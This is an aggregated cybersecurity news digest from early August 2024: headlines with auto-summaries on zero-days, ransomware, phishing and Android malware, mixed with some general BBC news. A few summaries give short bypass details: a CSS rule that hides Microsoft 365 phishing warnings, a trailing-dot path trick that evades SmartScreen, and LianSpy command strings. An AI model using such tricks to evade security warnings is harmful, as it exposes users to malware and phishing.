          exploits
          2024-08-08 https://www.helpnetsecurity.com/2024/08/08/windows-downgrade-attack/

          A researcher has developed a downgrade attack that can make Windows machines covertly, persistently and irreversibly vulnerable, even if they were fully patched before that. A downgrade attack exploiting the Windows Update process The direction of SafeBreach researcher Alon Leviev’s probing was inspired by the BlackLotus UEFI bootkit, which was able to bypass the UEFI Secure Boot by exploiting a vulnerability, as well as disable Windows security mechanisms (e.g., BitLocker, HVCI, and Windows Defender) and … More

          Autosummary: Two zero-days, yet unpatched The researcher exploited two currently unpatched zero-day elevation of privilege vulnerabilities (CVE-2024-38202, CVE-2024-21302) in the Windows Update Stack and Windows Secure Kernel, respectively, to reintroduce previously mitigated vulnerabilities, circumvent some VBS features, and exfiltrate data protected by VBS. A downgrade attack exploiting the Windows Update process The direction of SafeBreach researcher Alon Leviev's probing was inspired by the BlackLotus UEFI bootkit, which was able to bypass the UEFI Secure Boot by exploiting a vulnerability, as well as disable Windows security mechanisms (e.g., BitLocker, HVCI, and Windows Defender) and persist on compromised machines.


          New Phishing Scam Uses Google Drawings and WhatsApp Shortened Links

          financial
          2024-08-08 https://thehackernews.com/2024/08/new-phishing-scam-uses-google-drawings.html
          Cybersecurity researchers have discovered a novel phishing campaign that leverages Google Drawings and shortened links generated via WhatsApp to evade detection and trick users into clicking on bogus links designed to steal sensitive information. "The attackers chose a group of the best-known websites in computing to craft the threat, including Google and WhatsApp to host the attack elements,

          Autosummary: "The attackers chose a group of the best-known websites in computing to craft the threat, including Google and WhatsApp to host the attack elements, and an Amazon look-alike to harvest the victim's information," Menlo Security researcher Ashwin Vamshi said.


          Musk shares faked far-right "detainment camp" for rioters post

          industry
          2024-08-08 https://www.bbc.com/news/articles/cp35w0kj2y4o
          The image was faked to look like it had come from the Daily Telegraph website.


          Take action now over riot posts, social media firms told

          industry
          2024-08-08 https://www.bbc.com/news/articles/c2076n7w4qlo
          The government and the media regulator have faced criticism for not intervening sooner.


          18-year-old security flaw in Firefox and Chrome exploited in attacks

          exploits
          2024-08-08 https://www.bleepingcomputer.com/news/security/18-year-old-security-flaw-in-firefox-and-chrome-exploited-in-attacks/
          A vulnerability disclosed 18 years ago, dubbed "0.0.0.0 Day", allows malicious websites to bypass security in Google Chrome, Mozilla Firefox, and Apple Safari and interact with services on a local network. [...]

          Autosummary: Number of public sites communicating with 0.0.0.0 Source: Oligo Security In response to Oligo's disclosure of this activity, the web browser developers are finally starting to take action: Google Chrome, the world's most popular web browser, has decided to take action and block access to 0.0.0.0 via a gradual rollout lasting from version 128 (upcoming) until version 133. Malicious request seen in the Selenium attacks Source: Oligo Security Finally, the "ShellTorch" vulnerability was reported by Oligo in October 2023, where the TorchServe web panel was bound to the 0.0.0.0 IP address by default instead of localhost, exposing it to malicious requests. For impacted devices, threat actors can exploit this flaw to remotely change settings, gain unauthorized access to protected information, and, in some cases, achieve remote code execution.


          ADT confirms data breach after customer info leaked on hacking forum

          financial
          2024-08-08 https://www.bleepingcomputer.com/news/security/adt-confirms-data-breach-after-customer-info-leaked-on-hacking-forum/
          ADT Inc. disclosed via a Form 8-K filing at the U.S. Securities and Exchange Commission (SEC) that hackers have gained access to its systems, which hold customer order details. [...]

          Autosummary: The threat actor says the leaked data includes 30,800 customer records, including customer emails, complete addresses, user IDs, and the products purchased.


          Over $40 million recovered and arrests made within days of firm realising it had fallen for Business Email Compromise scam

          financial
          2024-08-08 https://www.tripwire.com/state-of-security/over-40-million-recovered-and-arrests-made-within-days-after-firm-discovers
          According to the FBI, billions of dollars have been lost through Business Email Compromise (BEC) attacks in recent years, so you may well think that there is little in the way of good news. However, it has been revealed this week that police managed to recover more than US $40 million snatched in a recent BEC heist just two days after being told about it. Read more in my article on the Tripwire State of Security blog.

          Autosummary: Today, money moves at the click of a button, and law enforcement must be able to move as fast to protect our citizens," said David Chew, Director of the Singapore Police Force's Commercial Affairs Department.


          0.0.0.0 Day: 18-Year-Old Browser Vulnerability Impacts MacOS and Linux Devices

          exploits Linux
          2024-08-08 https://thehackernews.com/2024/08/0000-day-18-year-old-browser.html
          Cybersecurity researchers have discovered a new "0.0.0.0 Day" impacting all major web browsers that malicious websites could take advantage of to breach local networks. The critical vulnerability "exposes a fundamental flaw in how browsers handle network requests, potentially granting malicious actors access to sensitive services running on local devices," Oligo Security researcher Avi Lumelsky


          Judge rejects bulk of Mexico's $10bn US guns lawsuit

          latam
          2024-08-08 https://www.bbc.com/news/articles/c98510jdee4o
          Mexico's government has long alleged that US-made guns have contributed to high rates of violence.

          Autosummary: The lawsuit, filed in a federal courthouse in Massachusetts - where several of the companies are based - argued that the "flood" of illegal guns in Mexico "is the foreseeable result of the defendants' deliberate actions and business practices".


          Secrets of hovering kestrels to help drones beat city winds

          government
          2024-08-08 https://www.bbc.com/news/articles/c89wlnz1nzko
          Researchers hope they could inspire new drone and plane designs able to better cope with turbulence.

          Autosummary: Steady ahead Camera and motion capture technology enabled researchers to observe two Nankeen Kestrels, called Kevy and Jedda, as they hovered in a wind tunnel operated by RMIT.


          CISA warns about actively exploited Apache OFBiz RCE flaw

          exploits
          2024-08-08 https://www.bleepingcomputer.com/news/security/cisa-warns-about-actively-exploited-apache-ofbiz-rce-flaw/
          The U.S. Cybersecurity & Infrastructure Security Agency is warning of two vulnerabilities exploited in attacks, including a path traversal impacting Apache OFBiz. [...]

          Autosummary: Demonstration of Apache OFBiz flaw New pre-auth RCE As CISA warns about active exploitation for CVE-2024-32113, a newer flaw that impacts more recent versions of Apache OFBiz was uncovered earlier this week.


          Exploit released for Cisco SSM bug allowing admin password changes

          exploits
          2024-08-08 https://www.bleepingcomputer.com/news/security/exploit-released-for-cisco-ssm-bug-allowing-admin-password-changes/
          Cisco warns that exploit code is now available for a maximum severity vulnerability that lets attackers change any user password on unpatched Cisco Smart Software Manager On-Prem (Cisco SSM On-Prem) license servers. [...]


          Cisco warns of critical RCE zero-days in end of life IP phones

          exploits
          2024-08-08 https://www.bleepingcomputer.com/news/security/cisco-warns-of-critical-rce-zero-days-in-end-of-life-ip-phones/
          Cisco is warning of multiple critical remote code execution zero-days in the web-based management interface of the end-of-life Small Business SPA 300 and SPA 500 series IP phones. [...]

          Autosummary: Vulnerability details Cisco has disclosed five flaws, three rated critical (CVSS v3.1 score: 9.8) and two categorized as high-severity (CVSS v3.1 score: 7.5).


          Black Hat USA 2024: How cyber insurance is shaping cybersecurity strategies

          ciber
          2024-08-08 https://www.welivesecurity.com/en/business-security/black-hat-usa-2024-cyber-insurance-shaping-cybersecurity-strategies/
          Cyber insurance is not only a safety net, but it can also be a catalyst for advancing security practices and standards.

          Autosummary: What the future holds for business cybersecurity, according to cyber insurers The cyber risk insurance ecosystem is changing, moving from human-based underwriting, annual policies, with dozens of inputs and physical forms to a machine-augmented, continuous monitoring of zillions of inputs, all in the digital realm.


          What it's like to be your country's only Olympian

          government
          2024-08-07 https://www.bbc.com/news/articles/czxll21leryo
          Four nations have just one athlete at the Games - it's a hard, lonely experience, they say, but also a source of pride.

          Autosummary: "When the performance is lacking, I'm like, 'Man, I hope I didn't make you all disappointed,'" he said. Hassan, 26, told the BBC he was "very happy" to be his nation's solitary envoy at Paris 2024, but admitted there was a flipside: "I feel very sad when I'm alone.


          Number of incidents affecting GitHub, Bitbucket, GitLab, and Jira continues to rise

          ransomware
          2024-08-07 https://www.helpnetsecurity.com/2024/08/07/github-bitbucket-gitlab-jira-incidents/

          Outages, human errors, cyberattacks, data breaches, ransomware, security vulnerabilities, and, as a result, data loss are the reality that DevSecOps teams have to face every few days, according to GitProtect.io. DevSecOps The possibility to integrate security in development processes has given rise to DevSecOps, where development and operations teams work together with security teams and all their processes are converged. In DevSecOps, security is not an afterthought but a fundamental component integrated from the outset … More

          Autosummary: Outages, human errors, cyberattacks, data breaches, ransomware, security vulnerabilities, and, as a result, data loss are the reality that DevSecOps teams have to face every few days, according to GitProtect.io. In 2023, the number of events with the greatest negative impact on the operation of DevOps services (GitHub, Bitbucket, GitLab, and Jira) did not exceed 14%: GitHub recorded 13.94% of events, Bitbucket 8.33%, GitLab 7.89%, and Jira only 4%. Most issues affected components' operation, resulting in degraded performance at various levels.


          OpenWrt dominates, but vulnerabilities persist in OT/IoT router firmware

          industry
          2024-08-07 https://www.helpnetsecurity.com/2024/08/07/ot-iot-router-firmware-vulnerabilities/

          Forescout has published a new report examining the current state of the software supply chain in OT/IoT routers. The study uncovered that OT and IoT cellular routers and those used in small offices and homes contain outdated software components associated with known (“n-day”) vulnerabilities. The research showed that widely used OT/IoT router firmware images have, on average, 20 exploitable n-day vulnerabilities affecting the kernel, leading to increasing security risks. Number of historical vulnerabilities by CVSS … More

          Autosummary: On average, 41% of binaries across firmware images use RELRO, 31% use stack canaries, 65% use NX, 75% use PIE, 4% use RPath, and 35% have debugging symbols. On average, firmware images had 161 known vulnerabilities in their most common components: 68 with a low or medium CVSS score, 69 with a high score, and 24 with a critical score.


          Chameleon Android Banking Trojan Targets Users Through Fake CRM App

          financial exploits
          2024-08-07 https://thehackernews.com/2024/08/chameleon-android-banking-trojan.html
          Cybersecurity researchers have lifted the lid on a new technique adopted by threat actors behind the Chameleon Android banking trojan targeting users in Canada by masquerading as a Customer Relationship Management (CRM) app. "Chameleon was seen masquerading as a CRM app, targeting a Canadian restaurant chain operating internationally," Dutch security outfit ThreatFabric said in a technical


          Online games likely to be hit if strikes continue - union

          ransomware
          2024-08-07 https://www.bbc.com/news/articles/cvgddkq2zx9o
          The union leading the video game performers' strike says multiplayer games might be first affected.

          Autosummary: "I've had the experience of people showing me AI film work, for example, and being like, 'oh, look how amazing this is'," he says. Surgent Studios Abu also voiced the main character in the English dub of his game Tales of Kenzera: Zau "I think it will probably cost more really, truly, because let's say you make a whole game based on AI voices and you realise that the voices aren't necessarily that great," he says.


          Pig-butchering scammer targets BBC journalist

          financial
          2024-08-07 https://www.bitdefender.com/blog/hotforsecurity/pig-butchering-scammer-targets-bbc-journalist/
          Cybersecurity journalist Joe Tidy has found himself in the unusual position of being targeted by a scammer calling herself "Jessica", he revealed this week. Read more in my article on the Hot for Security blog.

          Autosummary: "Jessica" told Tidy that he would have to address her as "Miss Queen" and "do exactly as she said", which included promising to go to Chicago to buy her "a romantic gift or meal" with some of the profits she assured him he would make. In Tidy's case, "Jessica" asked for an initial investment and then made him go through a series of fake cryptocurrency investments where he was shown that his "profits" were "increasing.


          Government concerned by immigration lawyer "hitlist"

          government
          2024-08-07 https://www.bbc.com/news/articles/c624r77gnm2o
          The list is being shared on social media - lawyers say the threat to them is "very credible."

          Autosummary: Mr McMahon warned people could "expect the full force of the law" if they "cross the line", whether it is "on the street or online".


          Critical Progress WhatsUp RCE flaw now under active exploitation

          exploits
          2024-08-07 https://www.bleepingcomputer.com/news/security/critical-progress-whatsup-rce-flaw-now-under-active-exploitation/
          Threat actors are actively attempting to exploit a recently fixed Progress WhatsUp Gold remote code execution vulnerability on exposed servers for initial access to corporate networks. [...]

          Autosummary: On June 25, 2024, Progress released a security bulletin warning about fifteen high and critical-severity bugs, including CVE-2024-4885, a 9.8-rated critical RCE flaw.


          Microsoft 365 anti-phishing feature can be bypassed with CSS

          financial
          2024-08-07 https://www.bleepingcomputer.com/news/security/microsoft-365-anti-phishing-feature-can-be-bypassed-with-css/
          Researchers have demonstrated a method to bypass an anti-phishing measure in Microsoft 365 (formerly Office 365), elevating the risk of users opening malicious emails. [...]

          Autosummary: The warning tip rendered on the Outlook app Source: Certitude Certitude discovered that it's possible to hide this safety message by manipulating the CSS (Cascading Style Sheets) within the HTML of the email, as shown below: HTML code used for the bypass Source: Certitude The role of each rule is the following: a { display: none; }: Hides any anchor (<a>)


          New Linux Kernel Exploit Technique "SLUBStick" Discovered by Researchers

          exploits Linux
          2024-08-07 https://thehackernews.com/2024/08/new-linux-kernel-exploit-technique.html
          Cybersecurity researchers have shed light on a novel Linux kernel exploitation technique dubbed SLUBStick that could be exploited to elevate a limited heap vulnerability to an arbitrary memory read-and-write primitive. "Initially, it exploits a timing side-channel of the allocator to perform a cross-cache attack reliably," a group of academics from the Graz University of Technology said [PDF].


          McLaren hospitals disruption linked to INC ransomware attack

          exploits ransomware
          2024-08-07 https://www.bleepingcomputer.com/news/security/mclaren-hospitals-disruption-linked-to-inc-ransomware-attack/
          On Tuesday, IT and phone systems at McLaren Health Care hospitals were disrupted following an attack linked to the INC Ransom ransomware operation. [...]

          Autosummary: Compromised data included names, Social Security numbers, health insurance and physician information, as well as Medicare/Medicaid, prescription/medication, and diagnostic results and treatment information.


          UK IT provider faces $7.7 million fine for 2022 ransomware breach

          exploits ransomware
          2024-08-07 https://www.bleepingcomputer.com/news/security/uk-it-provider-faces-77-million-fine-for-2022-ransomware-breach/
          The UK's Information Commissioner's Office (ICO) has announced a provisional decision to impose a fine of £6.09M ($7.74 million) on Advanced Computer Software Group Ltd (Advanced) for its failure to protect the personal information of tens of thousands when it was hit by ransomware in 2022. [...]


          FBI: BlackSuit ransomware made over $500 million in ransom demands

          exploits ransomware
          2024-08-07 https://www.bleepingcomputer.com/news/security/fbi-blacksuit-ransomware-made-over-500-million-in-ransom-demands/
          CISA and the FBI confirmed today that the Royal ransomware rebranded to BlackSuit and has demanded over $500 million from victims since it emerged more than two years ago. [...]

          Autosummary: In March 2023 and a subsequent November 2023 advisory update, the two agencies shared indicators of compromise and a list of tactics, techniques, and procedures (TTPs) to help defenders block the gang's attempts to deploy ransomware on their networks.


          New CMoon USB worm targets Russians in data theft attacks

          rusia-ucrania
          2024-08-07 https://www.bleepingcomputer.com/news/security/new-cmoon-usb-worm-targets-russians-in-data-theft-attacks/
          A new self-spreading worm named "CMoon," capable of stealing account credentials and other data, has been distributed in Russia since early July 2024 via a compromised gas supply company website. [...]

          Autosummary: An interesting and somewhat unusual feature is the targeting of files that might contain account credentials such as .pfx, .p12, .kdb, .kdbx, .lastpass, .psafe3, .pem, .key, .private, .asc, .gpg, .ovpn, and .log files.


          Critical XSS bug in Roundcube Webmail allows attackers to steal emails and sensitive data

          exploits
          2024-08-07 https://securityaffairs.com/166736/hacking/critical-xss-bug-in-roundcube-webmail.html
          Researchers warn of flaws in the Roundcube webmail software that could be exploited to steal sensitive information from target accounts. Sonar's Vulnerability Research Team discovered a critical Cross-Site Scripting (XSS) vulnerability in the popular open-source webmail software Roundcube. Roundcube is included by default in the server hosting panel cPanel which has millions of installations worldwide. […]

          Autosummary: An attacker can trigger the vulnerability to execute arbitrary JavaScript in the victim's browser when they view a malicious email, potentially leading to the theft of emails, contacts, passwords, and unauthorized email sending.


          The real story of the news website accused of fuelling riots

          industry
          2024-08-07 https://www.bbc.com/news/articles/c5y38gjp4ygo
          The BBC tracks down a Canadian hockey player, a dad in Pakistan and a Texan named Kevin linked to Channel3Now.

          Autosummary: Kevin claims there are "more than 30" people in the US, UK, Pakistan and India who work for the site, usually recruited from sites for freelancers - including Farhan and James. The BBC has tracked down several people linked to Channel3Now, spoken to their friends and colleagues, who have corroborated that they are real people, and questioned a person who claims to be the "management" at the site. He says how Farhan in particular was not involved in the false Southport story, which the site has publicly apologised for, and blamed "our UK-based team". Kevin says he is speaking to me from the site's "main office" in the US - which fits with both the timings of the social media posts on some of the site's social media profiles, and the times Kevin replies to my emails.


          FBI: BlackSuit ransomware behind over $500 million in ransom demands

          exploits ransomware
          2024-08-07 https://www.bleepingcomputer.com/news/security/fbi-blacksuit-ransomware-behind-over-500-million-in-ransom-demands/
          CISA and the FBI confirmed today that the Royal ransomware rebranded to BlackSuit and has demanded over $500 million from victims since it emerged more than two years ago. [...]

          Autosummary: In March 2023 and a subsequent November 2023 advisory update, the two agencies shared indicators of compromise and a list of tactics, techniques, and procedures (TTPs) to help defenders block the gang's attempts to deploy ransomware on their networks.


          AI-fueled phishing scams raise alarm ahead of U.S. presidential election

          financial
          2024-08-06 https://www.helpnetsecurity.com/2024/08/06/phishing-scams-2024-us-presidential-election/

          Highlighting growth of phishing and digital scams targeting United States citizens, Bolster released research that identified 24 separate nation-state threat actor groups attempting to exploit rising political tensions across the US to interfere with the 2024 presidential election. "We know the frequency of phishing attacks is increasing, as hackers utilize AI to execute more scams than ever before. In fact, phishing scams are being hosted in the US at a rate of nearly double, … More

          Autosummary: "More troubling, our researchers identified packages of voter data stolen over the past decade, for sale on the dark web and used by threat actors to create fake identification cards, potentially leading to identity theft or voter fraud."


          New Zero-Day Flaw in Apache OFBiz ERP Allows Remote Code Execution

          exploits
          2024-08-06 https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html
          A new zero-day pre-authentication remote code execution vulnerability has been disclosed in the Apache OFBiz open-source enterprise resource planning (ERP) system that could allow threat actors to achieve remote code execution on affected instances. Tracked as CVE-2024-38856, the flaw has a CVSS score of 9.8 out of a maximum of 10.0. It affects Apache OFBiz versions prior to 18.12.15. "The


          Google Patches New Android Kernel Vulnerability Exploited in the Wild

          exploits Linux
          2024-08-06 https://thehackernews.com/2024/08/google-patches-new-android-kernel.html
          Google has addressed a high-severity security flaw impacting the Android kernel that has been actively exploited in the wild. The vulnerability, tracked as CVE-2024-36971, has been described as a case of remote code execution impacting the kernel. "There are indications that CVE-2024-36971 may be under limited, targeted exploitation," the tech giant noted in its monthly Android security


          Magniber ransomware targets home users

          exploits ransomware
          2024-08-06 https://www.malwarebytes.com/blog/news/2024/08/magniber-ransomware-targets-home-users
          Home users are being targeted by a ransomware called Magniber which locks up files and demands money for the key.

          Autosummary: BleepingComputer, which has a dedicated forum for ransomware victims, reports: "A massive Magniber ransomware campaign is underway, encrypting home users' devices worldwide and demanding thousand-dollar ransoms to receive a decryptor." How home users can prevent ransomware There are some rules that can help you avoid falling victim to this type of ransomware: Make sure your system and software are on the latest version.


          Google warns of an actively exploited Android kernel flaw

          exploits Linux
          2024-08-06 https://securityaffairs.com/166656/breaking-news/google-actively-exploited-android-kernel-flaw.html
          Google addressed an actively exploited high-severity vulnerability, tracked as CVE-2024-36971, impacting the Android kernel. Google fixed a high-severity flaw, tracked as CVE-2024-36971, impacting the Android kernel. The IT giant is aware that the vulnerability has been actively exploited in the wild. The company did not share details of the attacks exploiting this vulnerability. The vulnerability […]

          Autosummary: Android Security Bulletin for August 2024 addressed a total of 47 vulnerabilities in Framework (13), System (1), Kernel (1), Arm components (2), Imagination Technologies (1), MediaTek components (1), Qualcomm components (21), and Qualcomm closed-source components (7).


          France's Grand Palais discloses cyberattack during Olympic games

          ciber
          2024-08-06 https://www.bleepingcomputer.com/news/security/frances-grand-palais-discloses-cyberattack-during-olympic-games/
          The Grand Palais Réunion des musées nationaux (Rmn) in France is warning that it suffered a cyberattack on Saturday night, August 3, 2024. [...]

          Autosummary: However, claims that the attack affected other museums, including the prestigious Louvre—which is especially vital during the current tourism boom—were disputed on X by the Louvre's director, Matthias Grolier.


          Android vulnerability used in targeted attacks patched by Google

          exploits
          2024-08-06 https://www.malwarebytes.com/blog/news/2024/08/android-vulnerability-used-in-targeted-attacks-patched-by-google
          Google has issued security updates for 46 vulnerabilities, including a patch for a remote code execution flaw which has been used in limited targeted attacks.

          Autosummary: Android partners, such as Samsung, Sony, etc., are notified of all issues at least a month before publication; however, this doesn't always mean that the patches are available for devices from all vendors.


          FTC warns consumers of scammers offering to remove all negative information from credit reports

          financial
          2024-08-06 https://www.bitdefender.com/blog/hotforsecurity/ftc-warns-consumers-of-scammers-offering-to-remove-all-negative-information-from-credit-reports/
          Are you eager for your credit report to be "cleaned-up" so lenders and landlords will have a better opinion of your financial responsibility and creditworthiness? You might be wise to read my article on the Hot for Security blog.

          Autosummary: It is also possible to fix errors yourself by getting a free credit report from the likes of Equifax, Experian, and TransUnion, and disputing any mistakes you might see with the credit bureau.


          Ransomware gang targets IT workers with new RAT masquerading as IP scanner

          exploits
          2024-08-06 https://www.helpnetsecurity.com/2024/08/06/ransomware-targets-it-workers/

          Ransomware-as-a-service outfit Hunters International is wielding a new remote access trojan (RAT). “The malware, named SharpRhino due to its use of the C# programming language, is delivered through a typosquatting domain impersonating the legitimate tool Angry IP Scanner,” Quorum Cyber researchers discovered. Angry IP Scanner is an IP address and port scanner, and as such is more likely to be downloaded and used by IT workers. Such specific targeting might be an attempt to compromise … More

          The post Ransomware gang targets IT workers with new RAT masquerading as IP scanner appeared first on Help Net Security.

          "

Autosummary: “Typical of ransomware operators, Hunters International exfiltrates data from victim organisations prior to encrypting files, changing file extensions to .locked, and leaving a README message guiding recipients to a chat portal on the TOR network for payment instructions,” the researchers noted. "


          INTERPOL Recovers $41 Million in Largest Ever BEC Scam in Singapore

          financial
          2024-08-06 https://thehackernews.com/2024/08/interpol-recovers-41-million-in-largest.html
INTERPOL said it devised a "global stop-payment mechanism" that helped facilitate the largest-ever recovery of funds defrauded in a business email compromise (BEC) scam. The development comes after an unnamed commodity firm based in Singapore fell victim to a BEC scam in mid-July 2024. It refers to a type of cybercrime where a malicious actor poses as a trusted figure and uses email to "

          Autosummary: Specifically, cryptocurrency addresses controlled by Cryptonator transacted with darknet markets, virtual exchanges, and criminal marketplaces like Bitzlato, Blender, Finiko, Garantex, Hydra, Nobitex, and an unnamed terrorist entity. "


          CISA adds Microsoft COM for Windows bug to its Known Exploited Vulnerabilities catalog

          exploits
          2024-08-06 https://securityaffairs.com/166670/security/cisa-microsoft-com-for-windows-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Microsoft COM for Windows bug to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a deserialization of untrusted data vulnerability in Microsoft COM for Windows, tracked as CVE-2018-0824 (CVSS score of 7.5), to its Known Exploited Vulnerabilities (KEV) catalog. A deserialization […] "

          Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a deserialization of untrusted data vulnerability in Microsoft COM for Windows, tracked as CVE-2018-0824 (CVSS score of 7.5), to its Known Exploited Vulnerabilities (KEV) catalog. "


          Google Chrome will let you send money to your favourite website

          financial
          2024-08-06 https://www.bleepingcomputer.com/news/google/google-chrome-will-let-you-send-money-to-your-favourite-website/
          Google has confirmed plans to implement Web Monetization in Chrome, allowing website owners to receive micro-payments as tips or rewards for their content as an additional way to generate revenue. [...] "

          Autosummary: "


          A ransomware attack hit French museum network

          exploits ransomware
          2024-08-06 https://securityaffairs.com/166696/cyber-crime/ransomware-attack-french-museum-network.html
          The Réunion des Musées Nationaux network, including Paris’ Grand Palais and other museums, was hit by a ransomware attack. A ransomware attack hit the Réunion des Musées Nationaux network, including Paris’ Grand Palais and other museums. The attack impacted around 40 museums across France. The attack occurred on Sunday, and despite some affected venues are […] "

          Autosummary: "


          Tech Life: Turning the tables on romance scammers

          financial
          2024-08-06 https://www.bbc.co.uk/sounds/play/w3ct5wmh
          We speak to the BBC journalist who exposed an online con. "

          Autosummary: "


          How to start your cybersecurity career: Expert tips and guidance

          ciber
          2024-08-05 https://www.helpnetsecurity.com/2024/08/05/start-cybersecurity-career-expert-tips/

          As businesses strive to protect their data and privacy, the demand for skilled cybersecurity professionals continues to grow. This article provides expert advice to help you navigate the early stages of your cybersecurity career, offering practical tips and insights. Brian Honan, CEO at BH Consulting When advising people at the start of their cybersecurity careers, I recommend that they focus on human networking. I strongly recommend that people get involved in the cybersecurity community/industry. This … More

          The post How to start your cybersecurity career: Expert tips and guidance appeared first on Help Net Security.

          "

Autosummary: Biljana Cerin, Information Risk, Business Development and Project Lead, Infoedge: My opinion about starting a career in cybersecurity is a very strong one: if you don’t have a true passion for the field, if you find it a “trendy” profession at the moment, and are not willing to learn, listen, and expand your professional comfort zone every day, taking full responsibility for your actions, you should stay away from it. These domains include SOC processes & methodologies, SIEM operations, tactical analysis, log analysis, threat hunting, Active Directory attack analysis, network traffic analysis, malware analysis, and DFIR operations. I would recommend vital networking through professional associations, and as soon as you feel confident about some, no matter how small, professional domain, I’d suggest getting “out there” and presenting your knowledge – within your team, a department maybe as the next step, and as you grow further, through available professional communities’ events. Once the answer is yes to both of these questions, I’d try and find a mentor who can guide me through the significant amount of information, knowledge, and requirements related to the field and pursuing formal education through colleges, universities, or specialised seminars by well-respected organizations, should the finances or arrangements with the employer allow. As a result, individuals looking to start or pivot into a cybersecurity career must find alternative ways to gain these practical skills, such as self-teaching, internships, apprenticeships, or on-the-job training. "


          How life sciences companies use AI to fill the cybersecurity skills gap

          ciber
          2024-08-05 https://www.helpnetsecurity.com/2024/08/05/life-sciences-companies-cybersecurity-skills-gap-video/

In this Help Net Security video, Beth Miller, Field CISO at Code42, highlights a significant trend: 73% of life sciences companies turn to AI to address the cybersecurity skills gap, surpassing adoption rates in other industries. Under-resourced security teams face increasing insider-driven data loss events, exacerbated by emerging technologies like AI and GenAI. Leaked trade secrets or critical intellectual property – research data, customer lists, pricing decks, formulary plans, clinical trial data, and source code … More

          The post How life sciences companies use AI to fill the cybersecurity skills gap appeared first on Help Net Security.

          "

          Autosummary: "


          The role of AI in cybersecurity operations

          ciber
          2024-08-05 https://www.helpnetsecurity.com/2024/08/05/ai-soc-analysts/

          Security operation centers (SOCs) need to be better equipped to manage the sheer scale of data to monitor and the increasing sophistication of threats. SOC analysts face a daunting task: sifting through thousands of alerts every day – most of which are false positives – while swiftly identifying and mitigating genuine threats. Many organizations have turned to AI to alleviate their SOC analysts’ load, but some cybersecurity workers fear that there may come a time … More

          The post The role of AI in cybersecurity operations appeared first on Help Net Security.

          "

          Autosummary: For example, AI-powered solutions can automate routine activities like alert triaging, log analysis, and vulnerability scanning, enabling human analysts to allocate their time and expertise toward more critical endeavors such as threat hunting, incident response planning, and security architecture design. As technologies like AI SOC analysts advance, they do not eclipse the need for human oversight; instead, they create opportunities for cybersecurity professionals to engage in more meaningful, analytical, and creative problem-solving tasks. "


New Android Trojan 'BlankBot' Targets Turkish Users' Financial Data

          financial exploits
          2024-08-05 https://thehackernews.com/2024/08/new-android-trojan-blankbot-targets.html
          Cybersecurity researchers have discovered a new Android banking trojan called BlankBot targeting Turkish users with an aim to steal financial information. "BlankBot features a range of malicious capabilities, which include customer injections, keylogging, screen recording and it communicates with a control server over a WebSocket connection," Intel 471 said in an analysis published last week. "

Autosummary: The names of some of the malicious APK files containing BlankBot are listed below:
          - app-release.apk (com.abcdefg.w568b)
          - app-release.apk (com.abcdef.w568b)
          - app-release-signed (14).apk (com.whatsapp.chma14)
          - app.apk (com.whatsapp.chma14p)
          - app.apk (com.whatsapp.w568bp)
          - showcuu.apk (com.whatsapp.w568b)
          Like the recently resurfaced Mandrake Android trojan, BlankBot implements a session-based package installer to circumvent the restricted settings feature introduced in Android 13 to block sideloaded applications from directly requesting dangerous permissions. "


          The Loper Bright Decision: How it Impacts Cybersecurity Law

          ciber
          2024-08-05 https://thehackernews.com/2024/08/the-loper-bright-decision-how-it.html
          The Loper Bright decision has yielded impactful results: the Supreme Court has overturned forty years of administrative law, leading to potential litigation over the interpretation of ambiguous laws previously decided by federal agencies. This article explores key questions for cybersecurity professionals and leaders as we enter a more contentious period of cybersecurity law. Background What is "

Autosummary: However, to ensure compliance with cybersecurity regulations that might now be challenged in court, companies should: Assess existing cybersecurity requirements to ensure they align with current regulations that are supported by clear statutory authority. The Loper Bright decision by the U.S. Supreme Court overruled the Chevron deference, stating that courts, not agencies, will decide all relevant questions of law arising on review of agency action. TSA's emergency amendments in 2022 for cybersecurity requirements for passenger and freight railroad carriers, as well as airport and aircraft operators, may be challenged. "


          Keytronic incurred approximately $17 million of expenses following ransomware attack

          exploits ransomware
          2024-08-05 https://securityaffairs.com/166595/data-breach/keytronic-lost-revenue-exceeding-17m.html
          Printed circuit board assembly (PCBA) manufacturer Keytronic reported that a recent ransomware attack led to expenses and lost revenue exceeding $17 million. In June, Keytronic disclosed a data breach after a ransomware group leaked allegedly stolen personal information from its systems. The company did not provide any info on the ransomware operation that hit its […] "

          Autosummary: “As previously disclosed, Key Tronic detected a cybersecurity incident on May 6, 2024 that caused disruptions and limited access to portions of the Company’s business applications supporting operations and corporate functions, including financial and operating reporting systems, at its Mexico and U.S. sites during the fourth quarter of fiscal 2024.” "


          Keytronic reports losses of over $17 million after ransomware attack

          exploits ransomware
          2024-08-05 https://www.bleepingcomputer.com/news/security/keytronic-reports-losses-of-over-17-million-after-ransomware-attack/
          Electronic manufacturing services provider Keytronic has revealed that it suffered losses of over $17 million due to a May ransomware attack. [...] "

Autosummary: Some of the notable victims include German defense contractor Rheinmetall, government contractor ABB, U.S. healthcare giant Ascension, U.K. tech outsourcing firm Capita, the American Dental Association, Hyundai's European division, the Toronto Public Library, and Yellow Pages Canada. "


          New LianSpy malware hides by blocking Android security feature

          exploits
          2024-08-05 https://www.bleepingcomputer.com/news/security/new-lianspy-malware-hides-by-blocking-android-security-feature/
          A previously undocumented Android malware named "LightSpy" has been discovered targeting Russian users, posing on phones as an Alipay app or a system service to evade detection. [...] "

Autosummary: WhatsApp, Chrome, Telegram, Facebook, Instagram, Gmail, Skype, Vkontakte, Snapchat, and Discord are among the many supported for selective screen capturing, which minimizes the risk of detection. Commands (table partially cut off in the excerpt):
          - (command not captured): Disable screen recording
          - *swl: Set new app list, stored right after command string, for screen recording
          - *wif+: Allow to run if device is connected to Wi-Fi
          - *wif-: Prohibit from running if device is connected to Wi-Fi only
          - *mob+: Allow to run if device is connected to mobile network
          - *mob-: (description not captured) "


          Windows Smart App Control, SmartScreen bypass exploited since 2018

          exploits
          2024-08-05 https://www.bleepingcomputer.com/news/microsoft/windows-smart-app-control-smartscreen-bypass-exploited-since-2018/
          A design flaw in Windows Smart App Control and SmartScreen that enables attackers to launch programs without triggering security warnings has been under exploitation since at least 2018. [...] "

Autosummary: To exploit this design flaw, one can append a dot or space to the target executable path (for instance, after a binary's extension like "powershell.exe.") or create an LNK file containing a relative path, such as ".\target.exe". "


